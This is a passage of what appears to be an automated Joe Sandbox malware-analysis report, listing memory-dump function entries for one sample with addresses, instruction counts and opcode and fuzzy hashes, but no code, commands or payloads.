                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 466e6e88e1036051a51119766dd685da4d3ce7749b37605238ff45dae01e92b7
                        • Instruction ID: 3073a8c08c5dd5792ff8109fb828322b38edd62cc5a572eb66c0a7c271553018
                        • Opcode Fuzzy Hash: 466e6e88e1036051a51119766dd685da4d3ce7749b37605238ff45dae01e92b7
                        • Instruction Fuzzy Hash: 9B315D71E0E94E9FEBA8DF9488A55BE77F0FF84300F55027AD01ED61A1CAB97A408741
                        Function 00007FFD9BAD490E Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a5aa008c4ac537ee926f8172efbe81de375bf22ef8928005b01582eb6e357a7
                        • Instruction ID: 46f10cc44c6e241b45454d20661485d3d08d8b6f2ea7d6372d5d5435a703dfb7
                        • Opcode Fuzzy Hash: 7a5aa008c4ac537ee926f8172efbe81de375bf22ef8928005b01582eb6e357a7
                        • Instruction Fuzzy Hash: AE31D430E0990D8FDF98EB98D4A9EAD7BF1FFA8301F410179D009D72A5DE74A9818B40
                        Function 00007FFD9BAD1B90 Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ab9b611ea8c0b333c8d045aea60c7dc65c389ac0488b67800023670f41ffc06
                        • Instruction ID: 01c09fcaf374053e047b9126c7c2c7934c864c199bc491fe19a04eb194d8ba80
                        • Opcode Fuzzy Hash: 7ab9b611ea8c0b333c8d045aea60c7dc65c389ac0488b67800023670f41ffc06
                        • Instruction Fuzzy Hash: 8E31C330E0EA8D8FDB55DBA8C8605EC7FB1FF9A314F0502AAD04EE71A2DA646905C750
                        Function 00007FFD9BAC1162 Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2540061b86c6b7c0a6dff23fd0cdc58148fd3d3a03cb34121785a4aba02da83a
                        • Instruction ID: 65e84189a780288b20952114182dd2145c2165fbe542952f9648df0d238f67a1
                        • Opcode Fuzzy Hash: 2540061b86c6b7c0a6dff23fd0cdc58148fd3d3a03cb34121785a4aba02da83a
                        • Instruction Fuzzy Hash: D9316B31E0A65E8FDB55EFA4C8606FD7BF1FF59310F0001AAE019E72A1CA789941CB90
                        Function 00007FFD9BAC687D Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf4f3879cb86863c26ada25c3b5ad1c53b5c19dac3c9a464e92f54753653e76a
                        • Instruction ID: 49b03025e2251cbc5b3aefa63d18402843f74d8adb2ccd7df33c5f51206bfc06
                        • Opcode Fuzzy Hash: bf4f3879cb86863c26ada25c3b5ad1c53b5c19dac3c9a464e92f54753653e76a
                        • Instruction Fuzzy Hash: 7F31E031A0D68E4FDB41EB68D861AED7BB1FF59310F0502B5E408E31A6CA386941CB51
                        Function 00007FFD9BACAEF3 Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b82c4877c6519ce8561905e0a4599319c7ce02af0caea56eca257b9e8d8cdc42
                        • Instruction ID: 4dbf665c1ab3771979fc13176cb61141f4468e25f02018719fdc7e2d8bef4560
                        • Opcode Fuzzy Hash: b82c4877c6519ce8561905e0a4599319c7ce02af0caea56eca257b9e8d8cdc42
                        • Instruction Fuzzy Hash: CF31FC71E1891D8FDF84EFA8C499EED77F1EF68310B4141B9D109D72A5DA74A841CB40
                        Function 00007FFD9BACEC07 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85e3f1c5251dcc6fe315ddf04df7942f8495086b3d579d5c16da097b90757b85
                        • Instruction ID: e5e1a97ae494cbc03f74601ff005d48957d1b065593adf7b597c60dcc36aa0f0
                        • Opcode Fuzzy Hash: 85e3f1c5251dcc6fe315ddf04df7942f8495086b3d579d5c16da097b90757b85
                        • Instruction Fuzzy Hash: 59312B31F1890D8FDF98EFA8C495EBC77F1EF69311B4101B9D009D72A6DA74A8818B40
                        Function 00007FFD9BACEE55 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9a1c0faeab79de2a644d06a6e5ad323ba554f2d40382d0da2a12be31964bada
                        • Instruction ID: 715ba4f7e9b16cf5e49cf393b933c41cf551e9ce0daab2f6eac312bcb3d09d0f
                        • Opcode Fuzzy Hash: b9a1c0faeab79de2a644d06a6e5ad323ba554f2d40382d0da2a12be31964bada
                        • Instruction Fuzzy Hash: E9216222F2D91D5BEB64F69CE8625BC73D2EF94660B560239E04ED32A1DD547D034384
                        Function 00007FFD9BAD48F7 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fa51854bdc56961177b77d01e388131a82777873bfa68ad34216cd8054fa620
                        • Instruction ID: 0f0e49cc1dee2bd81471beef6bb9ed4def8474a80953f500a4fda7622cca678a
                        • Opcode Fuzzy Hash: 2fa51854bdc56961177b77d01e388131a82777873bfa68ad34216cd8054fa620
                        • Instruction Fuzzy Hash: 7E31DA71E1990D8FDF94EFA8C4A5EAD7BF1FF69310B4102B9D009D72A6DE74A8418B40
                        Function 00007FFD9BACEC0F Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5976e41fd7437e91254e7973cb84d17175b8158934c0777dcd027e01427c3652
                        • Instruction ID: 27a2e9fbfa950230916d67aefdcabadc9cabc3cd5bb16c88735784852d3b0505
                        • Opcode Fuzzy Hash: 5976e41fd7437e91254e7973cb84d17175b8158934c0777dcd027e01427c3652
                        • Instruction Fuzzy Hash: 2B31F871F1980D8FDF94EF98C495EBD77F1EF68301B010179D009E72A5DA74A9818B80
                        Function 00007FFD9BAD4F11 Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53a042590f13c07ea4c4394cd33b916b102d2cde5db4646e8632259107961868
                        • Instruction ID: fd4b2d4cc4d2c1acd339b121aa4051df184323ae4389c76594b21a5efd1a07e1
                        • Opcode Fuzzy Hash: 53a042590f13c07ea4c4394cd33b916b102d2cde5db4646e8632259107961868
                        • Instruction Fuzzy Hash: 5C21C161B0E91D4FEB64979898299FD7BE0EF8D710B06027EE00ED31B1CE5869094691
                        Function 00007FFD9BACB511 Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e2d9b235df4d0843d43dae5f6ead0247274565b111ed16326b21c701fea7f4a6
                        • Instruction ID: 5683841f434e039d8fe0fe7d588a56dae5fbaf60e2b3d304eb6d1ae39d821ef1
                        • Opcode Fuzzy Hash: e2d9b235df4d0843d43dae5f6ead0247274565b111ed16326b21c701fea7f4a6
                        • Instruction Fuzzy Hash: DF213631F0E91D8FDB74AB9858295BC7BE0EF49310F45403AE10BD31A1CA5A6D009381
                        Function 00007FFD9BAD48FF Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a89497d3028387f1d9f1de0c31bad75c381910733d990bd154be2d08302a5a6
                        • Instruction ID: 29aa27f7d7dfb247936a39091cecf8eaaae89a24eba1b892ce5fd97c8135c09b
                        • Opcode Fuzzy Hash: 2a89497d3028387f1d9f1de0c31bad75c381910733d990bd154be2d08302a5a6
                        • Instruction Fuzzy Hash: 3A31CC71E1991D8FDF94EF98C499EAD77F1FFA8301B010279D009D72A5DE74A9418B40
                        Function 00007FFD9BACEC1E Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00e0bde00f5799a6ffd058fe6dc4dc32e20dbfc09a839a88ff6e6f72292c9329
                        • Instruction ID: b1fab610ca28307e0644cf9967323375b944e733f977f901d70f58f20f136a06
                        • Opcode Fuzzy Hash: 00e0bde00f5799a6ffd058fe6dc4dc32e20dbfc09a839a88ff6e6f72292c9329
                        • Instruction Fuzzy Hash: 4531E531B1990E8FDF98EB98C499EBD77F1EF68300F420065D01DD72A5DE78A9818B80
                        Function 00007FFD9BACAEFF Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b75b589d163dcd00bbbc69853449ec955fedd7ba7e48e05cfc5787c60faa96a7
                        • Instruction ID: 5b351a8063cc8d021695b4b77fcece9b39755e9ebfc8227247a63634619b73cb
                        • Opcode Fuzzy Hash: b75b589d163dcd00bbbc69853449ec955fedd7ba7e48e05cfc5787c60faa96a7
                        • Instruction Fuzzy Hash: ED31F870E1890D8FDF94EF98C499EBD77F1EF68301B014179D10AD72A5DA34A9818B80
                        Function 00007FFD9BAD4B45 Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae57cb9b352a66ad64285feb3a335d0d87d4b61337f1a3229fdb248c3b8cec05
                        • Instruction ID: 67fe434a1b5308987cc8b78ba57bcf6fec90b9b9808ca863ff3dded3222bd9b2
                        • Opcode Fuzzy Hash: ae57cb9b352a66ad64285feb3a335d0d87d4b61337f1a3229fdb248c3b8cec05
                        • Instruction Fuzzy Hash: BA216532F2D91D0BEB64E79CE4A65B873E2EFD8621B16037DD04EC32A5DD686D024380
                        Function 00007FFD9BACD6BC Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1460d53812fac49e832bdb39697f98d6942cd8fceaabb464bb83092779d3536a
                        • Instruction ID: ba6919b6f6b33eeac440c80d11d3cbc0950460bad2c20092da14012c32795a46
                        • Opcode Fuzzy Hash: 1460d53812fac49e832bdb39697f98d6942cd8fceaabb464bb83092779d3536a
                        • Instruction Fuzzy Hash: A0212912F1DC8E0FE7ACA76C186557963C2EFA425875442BAD05EC71DEEC6869028380
                        Function 00007FFD9BACEC30 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 555c0c36464b6baea9fc19c54b0cf3a5dd8167f45fbb054c401a07a09d7a3880
                        • Instruction ID: 63f026908879435066d99a198f852754304cbc809ff7133dbeac2f8b510c9d08
                        • Opcode Fuzzy Hash: 555c0c36464b6baea9fc19c54b0cf3a5dd8167f45fbb054c401a07a09d7a3880
                        • Instruction Fuzzy Hash: 6A21D831F1890D8FDF98FB98C496EAD77F1FF58301B414165D01DD72A5DA74A9418B40
                        Function 00007FFD9BAC0560 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 511eb79ac11a06c8231c8081e7b25debda446f7a22564630d9159de70b0f0a28
                        • Instruction ID: 652150201fc45b213a028465e98874a6cfef9b0a2d700825c63a8981d0083bbb
                        • Opcode Fuzzy Hash: 511eb79ac11a06c8231c8081e7b25debda446f7a22564630d9159de70b0f0a28
                        • Instruction Fuzzy Hash: CF21E570E0960E8FDB58EF98D8546FEB7B1FF58300F10056AE019E3290CB78AA508B94
                        Function 00007FFD9BAD4920 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da9183089cdaf5a81f65f1e3b8e6ddbb380ecca78e81f061b26c6d0021249f4a
                        • Instruction ID: c0f82329d7f67699d2f43155afc7886bf24bfe7209c69e8e397c61b822989cad
                        • Opcode Fuzzy Hash: da9183089cdaf5a81f65f1e3b8e6ddbb380ecca78e81f061b26c6d0021249f4a
                        • Instruction Fuzzy Hash: 0D21B831A1890D8FDF98EB98C4AAEAD77F1FFA8301B414169D019D72A5DE34A8418B40
                        Function 00007FFD9BACAF20 Relevance: .1, Instructions: 82COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2d59c02041c51660b086f0a0b26f314eb4e174424925b6b182f821186ecf9e9
                        • Instruction ID: 893994b2f1a95650684fa2c027826d104dee2a29460141654fa33d120de4491f
                        • Opcode Fuzzy Hash: d2d59c02041c51660b086f0a0b26f314eb4e174424925b6b182f821186ecf9e9
                        • Instruction Fuzzy Hash: CF21D871E1491D8FDF88FFA8C49AEAD77F1FF58301B414169D109D72A5DA34A841CB80
                        Function 00007FFD9BAD47C0 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a59b066c4ec7ada4d017f972a4b9e1e17b6e08fe748d885318dd8349c1b954d7
                        • Instruction ID: 09cbe9deb1c6f9c1c12451c9596709c62b9ece92c21c250fc7ea34b1371dc2c8
                        • Opcode Fuzzy Hash: a59b066c4ec7ada4d017f972a4b9e1e17b6e08fe748d885318dd8349c1b954d7
                        • Instruction Fuzzy Hash: 2E219652A1FAC91FE76603F868351656F50EFC761031A41FFD0D9C60FB8D88AE458352
                        Function 00007FFD9BAD0460 Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ede6aff71b8cd35b105bd6b6cfab6af01f3ae47eb6ade92ace987772a123ff90
                        • Instruction ID: 95d8252889af90bc8bcb97776face6de238602bb8c79e7a5c33f4903333136da
                        • Opcode Fuzzy Hash: ede6aff71b8cd35b105bd6b6cfab6af01f3ae47eb6ade92ace987772a123ff90
                        • Instruction Fuzzy Hash: 9B214920A1E49E4BE77CD75484784B877A1FFD0701B1586BAC49BCB4ABC82CB9C1D786
                        Function 00007FFD9BAC9876 Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0da1ef3ed9c133b1e18ee468e683db4b64221dfa3ff27c3b18aab9b1d7c7c8f6
                        • Instruction ID: cf686e65d26a12643575107b88fe6ecd32122992019e38f28b36fa6e541ca5c2
                        • Opcode Fuzzy Hash: 0da1ef3ed9c133b1e18ee468e683db4b64221dfa3ff27c3b18aab9b1d7c7c8f6
                        • Instruction Fuzzy Hash: 75213071E0A41D8EDB68EF98D8A1AFCB3B5FF59300F0150BAD02DA71A5CE746981CB44
                        Function 00007FFD9BAC9807 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 908f40ba58293bad6622778ae9a158b0e0c35dfeadfc7968aca5c61f9dc3ca08
                        • Instruction ID: f08d5d20c7fb9dde789f8d2bd9ce574ef7b9805fe4744f11589563ddda6ee909
                        • Opcode Fuzzy Hash: 908f40ba58293bad6622778ae9a158b0e0c35dfeadfc7968aca5c61f9dc3ca08
                        • Instruction Fuzzy Hash: 36217130E4A45D8FDBA8EF98C4A5AFCB3B1EF59300F015076D01DA71A6CE746981CB04
                        Function 00007FFD9BAC184D Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50d54cf951934d28ff615972c073f939e81cc2b6aff7a13f00721431a79cd2f2
                        • Instruction ID: 85c2b47d0080c49c07593e907e8246ddb8dbfb7f5b5852ca8a1fd9b3defc4d34
                        • Opcode Fuzzy Hash: 50d54cf951934d28ff615972c073f939e81cc2b6aff7a13f00721431a79cd2f2
                        • Instruction Fuzzy Hash: F7116D31A1995D8FDF90EF98C864AED7BF0FF58310F010576E408E3291DA74A9408B80
                        Function 00007FFD9BAC61A5 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2977b604a36a4c6122ecae798a08400f8bca50f03f58466c671cb083de1973e3
                        • Instruction ID: bb80d9d25ca3863368dd5ba459c81576b8810456309daa312530cb2c4cb36077
                        • Opcode Fuzzy Hash: 2977b604a36a4c6122ecae798a08400f8bca50f03f58466c671cb083de1973e3
                        • Instruction Fuzzy Hash: 69112631E0E29D4FDB52EFA898202F97BB0EF56300F0110B7D05CD3192DA7459148782
                        Function 00007FFD9BAC5F71 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 099c3658d097a6264cc8da63e6525e1b6a5b70a09da4c27724e11d21c09e97c9
                        • Instruction ID: 9382b43ff7864e73eece16bc584185b410529d31886a5a75e51e5b877c3debd3
                        • Opcode Fuzzy Hash: 099c3658d097a6264cc8da63e6525e1b6a5b70a09da4c27724e11d21c09e97c9
                        • Instruction Fuzzy Hash: DA01D63190F78D8FDB52ABA4CC25AEA7FF0EF46310F0501A6E189C71A2CA685559C791
                        Function 00007FFD9BAD4888 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf8f65b390936b917cfc4e25b8e3c7e41f5804d41f7836893eca2c311dfe3e67
                        • Instruction ID: 886e743f250c1e2530997bcdd2620b12c2dcf9674cb1d05a4301d6ec1fabf2d7
                        • Opcode Fuzzy Hash: bf8f65b390936b917cfc4e25b8e3c7e41f5804d41f7836893eca2c311dfe3e67
                        • Instruction Fuzzy Hash: 1B110631E1EA0D4FD798EB9894B55FC7BA1EF88310B45037ED40DC72EACD2419428342
                        Function 00007FFD9BAD4C2A Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c1566a48eb29f29115534ac6f70c9255d864029bbc4dd4984ceaab4e489ea16
                        • Instruction ID: 8ba423cdde77e2c816abd31e4199ae6c585f945636d626f69536b94af1f581e6
                        • Opcode Fuzzy Hash: 0c1566a48eb29f29115534ac6f70c9255d864029bbc4dd4984ceaab4e489ea16
                        • Instruction Fuzzy Hash: 1901C431B1DA4D4FEB64A7A8A4661ECB7E0FF89324B41017DD04DC21B3DD6969168300
                        Function 00007FFD9BACB22A Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b90fa29ba9fddb3023c64f76cda77c6aacaec0e58988db7e82f80042ff88c945
                        • Instruction ID: b0738469434c5fee7a0a9fd4fc0064768d7d68f31f24f9eb9720f3aa69ebeff3
                        • Opcode Fuzzy Hash: b90fa29ba9fddb3023c64f76cda77c6aacaec0e58988db7e82f80042ff88c945
                        • Instruction Fuzzy Hash: C901C831A1DA4C8FDB54EBA8E8616FC77E0EF55325F05007DE00DC3292D92959568740
                        Function 00007FFD9BAC1860 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb273a34efee06db3d72d5eb5ba245b11802aa52f865c002d046fd2ee4c64029
                        • Instruction ID: 83c6bd0260e88057baa5c123a3ebc910dfee3686ac35bc6fdeab24288156c12a
                        • Opcode Fuzzy Hash: fb273a34efee06db3d72d5eb5ba245b11802aa52f865c002d046fd2ee4c64029
